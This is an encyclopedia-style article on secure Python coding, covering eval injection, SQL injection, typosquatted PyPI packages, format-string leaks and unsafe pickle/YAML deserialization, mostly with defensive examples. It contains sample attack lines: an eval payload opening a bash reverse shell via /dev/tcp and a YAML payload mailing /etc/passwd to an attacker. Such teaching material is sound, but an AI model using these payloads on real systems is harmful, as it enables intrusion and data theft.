Secure Coding with Python

2 authors have contributed to this article
Last updated by sangeetha-prabhu on 2020-08-11 03:30:08
Created by arvindpdmn on 2019-01-03 16:31:53

Summary

Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.

OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).

While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.

Milestones

Dec
2008

Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.

Jul
2011
Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.

Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits that can retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or mount DoS attacks.

Dec
2016

Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though the documentation makes this clear, many implementations ignore the warning. To solve this problem, the secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.

Oct
2018
Malicious packages found on PyPI via static analysis. Source: Bertus 2018.

Bertus, a software security engineer, creates a static analysis tool to automatically detect if a package published on PyPI is malicious. From a scan of 123,000 packages, he identifies about a dozen such packages containing various exploits.

Nov
2019
Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.

Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding has become available only recently. Under this proposal, authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called the minimum security model. This PEP doesn't address the maximum security model, in which authors sign their own packages.

Dec
2019

German software developer Lukas Martini finds two typosquatting packages on PyPI. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish, with a capital I in place of the first l). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes it into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.

Aug
2020
Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.

Facebook open sources Pysa, a static analysis tool to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. Pysa warns when data from a source reaches a sink. It has techniques to mitigate false positives and false negatives.

Discussion

  • What are some guidelines for writing more secure Python code?
    Python2's input() is problematic. Source: Branca 2014, slide 28.

    It's essential to validate user input. If not, an attacker could execute arbitrary code. Python functions such as eval(), exec(), Python 2's input(), os.popen() and os.system(), along with the functions of the subprocess module, are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python 2's input() evaluates whatever is typed as a Python expression. Given the statement if passwd == input("Please enter your password"):, an attacker who types the variable name passwd turns the comparison into passwd == passwd, which is always true and bypasses authentication.
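
    As a minimal sketch of the alternative to eval(), the snippet below parses untrusted text with float() and ast.literal_eval(), both from the standard library. The function names add_numbers and parse_literal are illustrative and not taken from the article's sources.

```python
import ast


def add_numbers(a: str, b: str) -> float:
    """Add two numbers supplied as untrusted strings, without eval()."""
    # float() only parses numeric text; anything else raises ValueError.
    return float(a) + float(b)


def parse_literal(text: str):
    """Parse a Python literal (number, string, list, dict, ...) safely."""
    # ast.literal_eval() rejects names, function calls and attribute access.
    return ast.literal_eval(text)


if __name__ == "__main__":
    print(add_numbers("1", "2"))
    payload = "__import__('os').system('echo pwned')"
    try:
        add_numbers(payload, "2")
    except ValueError:
        print("add_numbers rejected the payload")
    try:
        parse_literal(payload)
    except ValueError:
        print("parse_literal rejected the payload")
```

    Neither call ever executes the payload: the text is treated as data to be parsed, not as code to be run.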

    Databases are also vulnerable to malicious input. Building database commands directly from user input exposes the application to what's commonly called SQL injection. Instead, validate the inputs and query databases via an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.
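
    The article recommends an ORM. The sketch below illustrates the underlying idea with a different but related technique, parameterized queries, using the standard sqlite3 module so that it runs without extra packages. The users table and the function names are assumptions made for the example.

```python
import sqlite3


def find_user_unsafe(conn, name):
    # Vulnerable: the input is spliced into the SQL statement itself.
    query = "SELECT id, name FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchall()


def find_user(conn, name):
    # The ? placeholder passes `name` as data, never as SQL text.
    query = "SELECT id, name FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])

attack = "nobody' OR '1'='1"
print(find_user_unsafe(conn, attack))  # the injected OR clause matches every row
print(find_user(conn, attack))         # no user has this literal name
```

    ORMs such as those named above generate parameterized statements of this kind on the developer's behalf.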

    Python's assert statement must be used only to check invariants while debugging. Using it for authentication (such as assert user.is_admin, "user does not have access") is wrong. Production servers often run Python with the -O option, in which case __debug__ is False and assert statements are not executed at all.
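
    A small sketch of the difference, assuming a hypothetical User class and a hypothetical delete_all_records operation: the explicit check survives any interpreter flags, whereas the assert version loses its check under python -O.

```python
class User:
    def __init__(self, name, is_admin=False):
        self.name = name
        self.is_admin = is_admin


def delete_all_records_unsafe(user):
    # Removed entirely when Python runs with -O, so the check disappears.
    assert user.is_admin, "user does not have access"
    return "records deleted"


def delete_all_records(user):
    # An explicit check always runs, whatever the interpreter flags.
    if not user.is_admin:
        raise PermissionError("user does not have access")
    return "records deleted"


guest = User("guest")
try:
    delete_all_records(guest)
except PermissionError as exc:
    print("denied:", exc)
```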

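    To create temporary files, avoid the deprecated tempfile.mktemp() function, which only returns a file name and leaves a window in which another process can create that file first. Use tempfile.mkstemp() or tempfile.NamedTemporaryFile() instead. In general, keep your Python distribution and the packages you use up to date. For example, earlier versions of CPython had memory overflow errors that could be exploited for arbitrary code execution.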
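
    A minimal sketch of creating a temporary file with tempfile.mkstemp() from the standard library. The helper name write_temp_report and the file prefix are illustrative.

```python
import os
import tempfile


def write_temp_report(data: bytes) -> str:
    """Write data to a new temporary file and return its path."""
    # mkstemp() creates and opens the file in one step, readable and
    # writable only by the creating user, so there is no gap between
    # choosing a name and creating the file.
    fd, path = tempfile.mkstemp(prefix="report-", suffix=".txt")
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


path = write_temp_report(b"hello")
with open(path, "rb") as handle:
    print(handle.read())
os.remove(path)  # mkstemp() leaves cleanup to the caller
```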

  • How should I manage Python dependencies for a more secure application?
    Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.

    PyPI is the repository from where third-party Python packages can be downloaded and installed if required by your project. Direct dependencies may have further dependencies. Any of these could have malicious code.

    It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code only resides in setup.py that executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.

    Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples: acqusition impersonates acquisition; bzip impersonates bz2file; crypt impersonates crypto; setup-tools impersonates setuptools; urlib3 impersonates urllib3; diango impersonates django.
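
    One way a team might guard against such names is to compare each requested package against a list of names it already trusts. The sketch below uses difflib from the standard library. The KNOWN_PACKAGES list, the function name and the 0.8 similarity cutoff are assumptions chosen for illustration, not a vetted detection method.

```python
import difflib

# Illustrative allowlist; a real project would build this from its own
# reviewed requirements.
KNOWN_PACKAGES = ["acquisition", "setuptools", "urllib3", "django", "jellyfish"]


def possible_typosquat(name, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return the trusted package that `name` closely resembles, or None."""
    normalized = name.lower().replace("_", "-")
    if normalized in known:
        return None  # exact match with a trusted name
    matches = difflib.get_close_matches(normalized, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None


for candidate in ["urlib3", "diango", "setup-tools", "django"]:
    print(candidate, "->", possible_typosquat(candidate))
```

    A name that is similar to, but not the same as, a trusted package deserves a manual look before installation.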

    PEP 458 proposes signing packages. However, a signature only verifies where a package comes from; it says nothing about whether the code is malicious. Instead, a combination of dynamic analysis (within a sandbox) and static analysis can be used to catch malicious packages.

  • What security risks do Python strings pose if used improperly?

    Python 3.0 (along with Python 2.6) introduced str.format() as a more powerful and flexible way to format strings. This method is called on a format string and it accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application gives users control of the format string, it can be misused to leak sensitive data.

    There are a few cases where such control may be common. Applications that are translated into multiple languages may use untrusted translators who may be given control of the format string. Some applications may permit users to configure behaviour that might be exposed as format strings.

    An example exploit is the code "{person.__init__.__globals__[CONFIG][API_KEY]}".format(person=person), where sensitive global data from a CONFIG dictionary is accessed via the argument.
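
    The leak can be reproduced in a few lines. In this sketch the Person class, the CONFIG dictionary and the key value are stand-ins invented for the demonstration.

```python
CONFIG = {"API_KEY": "s3cr3t-demo-key"}  # stand-in for sensitive global state


class Person:
    def __init__(self, name):
        self.name = name


person = Person("Ada")

# A format string the application expects users to supply.
harmless = "Hello, {person.name}!"
# A format string an attacker might supply instead: it walks from the
# object to its method, then to the module globals, then into CONFIG.
hostile = "{person.__init__.__globals__[CONFIG][API_KEY]}"

print(harmless.format(person=person))
leaked = hostile.format(person=person)
print(leaked)
```

    The application never passed CONFIG to format(), yet the format string reached it through the object's attributes.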

    We can overcome this by validating the format string. One approach is shown by Armin Ronacher, who subclasses Formatter and Mapping, makes use of formatter_field_name_split and raises an AttributeError if unsafe formats are detected.
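
    The sketch below is not Ronacher's implementation. It is a simpler and stricter variant that uses string.Formatter().parse() from the standard library to accept only plain named fields such as {name}. The names safe_format and UnsafeFormatError are hypothetical.

```python
from string import Formatter


class UnsafeFormatError(ValueError):
    """Raised when a format string reaches beyond plain field names."""


def safe_format(template: str, **values) -> str:
    """Format `template`, allowing only simple named fields like {name}."""
    for _literal, field_name, format_spec, _conv in Formatter().parse(template):
        if field_name is None:
            continue  # literal text with no replacement field
        # Reject attribute access (a.b), indexing (a[b]) and positional fields.
        if not field_name.isidentifier():
            raise UnsafeFormatError("unsafe field: %r" % field_name)
        # Reject fields nested inside the format spec, e.g. {x:{y.z}}.
        if format_spec and ("{" in format_spec or "}" in format_spec):
            raise UnsafeFormatError("nested fields are not allowed")
    return template.format(**values)


print(safe_format("Hello, {name}!", name="Ada"))
try:
    safe_format("{person.__init__.__globals__}", person=object())
except UnsafeFormatError as exc:
    print("rejected:", exc)
```

    This trades flexibility for safety: templates that legitimately need attribute access would require an explicit allowlist of permitted attributes.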

  • What's a secure way to do data deserialization in Python?
    An example exploit of pickle. Source: Branca 2014, slide 33.

    Deserialization recreates Python objects by reading their representation from disk or a network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because serialized objects are not just values. They contain constructors and methods that are executable code.
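
    With pickle, the mechanism is the __reduce__ method, which lets an object name a callable and arguments for pickle to invoke at load time. The sketch below keeps the callable harmless by evaluating a fixed arithmetic expression. The class name Innocent is made up for the demonstration.

```python
import pickle


class Innocent:
    """Looks like plain data, but tells pickle what to call on load."""

    def __reduce__(self):
        # pickle will call eval("6 * 7") when the data is loaded.
        # An attacker would name os.system and a shell command instead.
        return (eval, ("6 * 7",))


payload = pickle.dumps(Innocent())

# Loading does not rebuild an Innocent instance; it runs the callable
# and returns whatever that callable returns.
result = pickle.loads(payload)
print(result)
```

    The receiving side needs no knowledge of the Innocent class for this to work, which is why unpickling untrusted bytes is unsafe.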

    For example, a web application could store user information in a cookie that's serialized with the pickle or cPickle module. An attacker can replace the cookie with a pickle of an object whose __reduce__ method names malicious code, and that code is called during deserialization. A better approach is to store plain data and parse it with json.loads(). If pickle must be used, verify the payload's integrity with a cryptographic signature before deserializing. PyCrypto is a useful package for this.
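
    As a sketch of both ideas together, the snippet below stores cookie data as JSON and signs it with HMAC-SHA256. It uses the standard hmac and hashlib modules rather than PyCrypto so that it runs without extra packages. SECRET_KEY, the "|" separator and the function names are assumptions for the example.

```python
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-real-server-side-secret"  # hypothetical key


def _sign(body: str) -> str:
    return hmac.new(SECRET_KEY, body.encode("utf-8"), hashlib.sha256).hexdigest()


def encode_cookie(data: dict) -> str:
    """Serialize `data` as JSON and append an HMAC-SHA256 signature."""
    body = json.dumps(data, sort_keys=True)
    return body + "|" + _sign(body)


def decode_cookie(cookie: str) -> dict:
    """Verify the signature first, then parse the JSON body."""
    body, _, signature = cookie.rpartition("|")
    expected = _sign(body)
    # compare_digest() avoids leaking how much of the signature matched.
    if not hmac.compare_digest(signature.encode("utf-8"), expected.encode("utf-8")):
        raise ValueError("cookie signature mismatch")
    return json.loads(body)


cookie = encode_cookie({"user": "alice", "role": "viewer"})
print(decode_cookie(cookie))
```

    A cookie altered by the client fails verification before any parsing takes place, and JSON parsing itself only ever produces plain values.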

    Another serialization format is YAML. YAML files can represent Python objects. Like pickle, it's possible to modify them to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following payload reads the system's account file (/etc/passwd) and emails its contents to the attacker's address: !!python/object/apply:os.system ["cat /etc/passwd | mail <attacker's address>"]. Essentially, it's unwise to deserialize from an untrusted source. A safer alternative is to use yaml.safe_load() rather than yaml.load().

  • What are some resources for Python developers to create more secure code?

    Python core modules that can help developers build security features include hashlib, hmac and secrets. For passwords and security tokens, secrets should be preferred over random. Functions hmac.compare_digest() and secrets.compare_digest() are designed to mitigate timing attacks.
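
    A brief sketch of these modules in use. The variable names and token sizes are illustrative choices, not recommendations from the article.

```python
import hmac
import secrets

# URL-safe token, for example for a password-reset link.
reset_token = secrets.token_urlsafe(32)

# Hex-encoded token: 16 random bytes give 32 hex characters.
api_key = secrets.token_hex(16)

# Choose digits using the operating system's secure randomness source.
pin = "".join(secrets.choice("0123456789") for _ in range(6))


def tokens_match(supplied: str, stored: str) -> bool:
    """Compare two tokens in a way designed to resist timing attacks."""
    return hmac.compare_digest(supplied.encode("utf-8"), stored.encode("utf-8"))


print(len(api_key), len(pin), tokens_match(reset_token, reset_token))
```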

    Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.

    Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.

    Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP 458, PEP 506, PEP 551, and PEP 578.

Sample Code

  • # Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
    # Accessed: 2020-03-21
     
    # --------------------------------------------------
    # Exploit of eval()
    def addition(a, b):
      return eval("%s + %s" % (a, b))
     
    # Such an input might be a JSON response to a network request
    userinput = {
      "a": "__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#",
      "b": "2"
    }
    result = addition(userinput['a'], userinput['b'])
    print("The result is %d." % result)
     
     
    # --------------------------------------------------
    # Exploit of exec()
    # Can be exploited in the same way as eval()
    # Note: in Python 3, exec() always returns None, so the sum itself is lost
    def addition(a, b):
      return exec("%s + %s" % (a, b))
     
     
    # --------------------------------------------------
    # Bypass authentication in Python2's input()
    # Python2's input() evaluates what is typed, like eval(raw_input())
    # Python3's input() returns the input as a string and is therefore safer
    # get_user_pass() and login() stand for the application's own functions
    user_pass = get_user_pass("admin")
    if user_pass == input("Please enter your password"):
      login()
    else:
      print "Password is incorrect!"
     
    # Bypass authentication if user enters 'user_pass'
    # if user_pass == user_pass:  # this will evaluate as true

References

  1. Bertus. 2018. "Detecting Cyber Attacks in the Python Package Index (PyPI)." Medium, October 13. Accessed 2020-03-20.
  2. Bleaney, Graham and Sinan Cepel. 2020. "Pysa: An open source static analysis tool to detect and prevent security issues in Python code." Blog, Facebook Engineering, August 7. Accessed 2020-08-11.
  3. Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
  4. Chef InSpec Docs. 2020. "pip." Chef InSpec Docs, v4.18.100. Accessed 2020-03-21.
  5. Cimpanu, Catalin. 2017. "Ten Malicious Libraries Found on PyPI - Python Package Index." BleepingComputer, September 15. Accessed 2020-03-20.
  6. Cimpanu, Catalin. 2018. "Twelve malicious Python libraries found and removed from PyPI." ZDNet, October 27. Accessed 2020-03-20.
  7. Cimpanu, Catalin. 2019. "Two malicious Python libraries caught stealing SSH and GPG keys." ZDNet, December 4. Accessed 2020-03-20.
  8. D'Aprano, Steven. 2015. "PEP 506 -- Adding A Secrets Module To The Standard Library." Python.org, September 19. Accessed 2020-03-20.
  9. Franklin Jr, Curtis. 2019. "Malware in PyPI Code Shows Supply Chain Risks." Dark Reading, July 19. Accessed 2020-03-20.
  10. Kuppusamy, Trishank Karthik, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, and Justin Cappos. 2013. "PEP 458 -- Secure PyPI downloads with signed repository metadata." Python.org, September 27. Updated 2019-11-13. Accessed 2020-03-20.
  11. Leblanc, Maxime. 2018. "Rotten pickles: A quick introduction to offensive serialization techniques." poka-techblog, on Medium, March 13. Accessed 2020-03-20.
  12. Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
  13. Makai, Matt. 2020. "Object-relational Mappers (ORMs)." Full Stack Python. Accessed 2020-03-21.
  14. Mavituna, Ferruh. 2015. "SQL Injection Cheat Sheet." Blog, Netsparker, October 21. Updated 2019-08-26. Accessed 2020-03-20.
  15. National Security Authority. 2017. "skcsirt-sa-20170909-pypi." SK-CSIRT advisory, National Security Authority, Slovak Republic, September 09. Updated 2017-09-21. Accessed 2020-03-20.
  16. OWASP Python Security. 2020a. "OWASP Python Security Project." Accessed 2020-03-20.
  17. OWASP Python Security. 2020b. "Libraries." Accessed 2020-03-20.
  18. PyYAML Wiki. 2020. "PyYAML Documentation." Accessed 2020-03-21.
  19. Python. 2008. "What's New In Python 3.0." Python.org. Accessed 2020-03-21.
  20. Python. 2016. "Python 3.6.0." Python.org. Accessed 2020-03-21.
  21. Python. 2020. "Search Python.org: 'security PEP'." Accessed 2020-03-21.
  22. Python Docs. 2020a. "The Python Standard Library." v3.8.2, March 21. Accessed 2020-03-21.
  23. Python Docs. 2020b. "secrets — Generate secure random numbers for managing secrets." The Python Standard Library, v3.8.2, March 21. Accessed 2020-03-21.
  24. Python Docs. 2020c. "Input and Output." The Python Tutorial, v3.8.2, March 20. Accessed 2020-03-20.
  25. Ronacher, Armin. 2016. "Be Careful with Python's New-Style String Format." Blog, December 29. Accessed 2020-03-20.
  26. Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
  27. Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
  28. Talin. 2006. "PEP 3101 -- Advanced String Formatting." Python.org, April 16. Updated 2008-09-14. Accessed 2020-03-21.
  29. Viter, Alexander. 2018. "How to write secure code in Python." Blog, CheckiO, August 22. Accessed 2020-03-20.

Further Reading

  1. Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
  2. Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
  3. Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
  4. Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
  5. Denbraver, Hayley and Kenneth Reitz. 2019. "Python Security Best Practices Cheat Sheet." Blog, Snyk, February 28. Accessed 2020-03-20.

Cite As

Devopedia. 2020. "Secure Coding with Python." Version 5, August 11. Accessed 2020-10-21. https://devopedia.org/secure-coding-with-python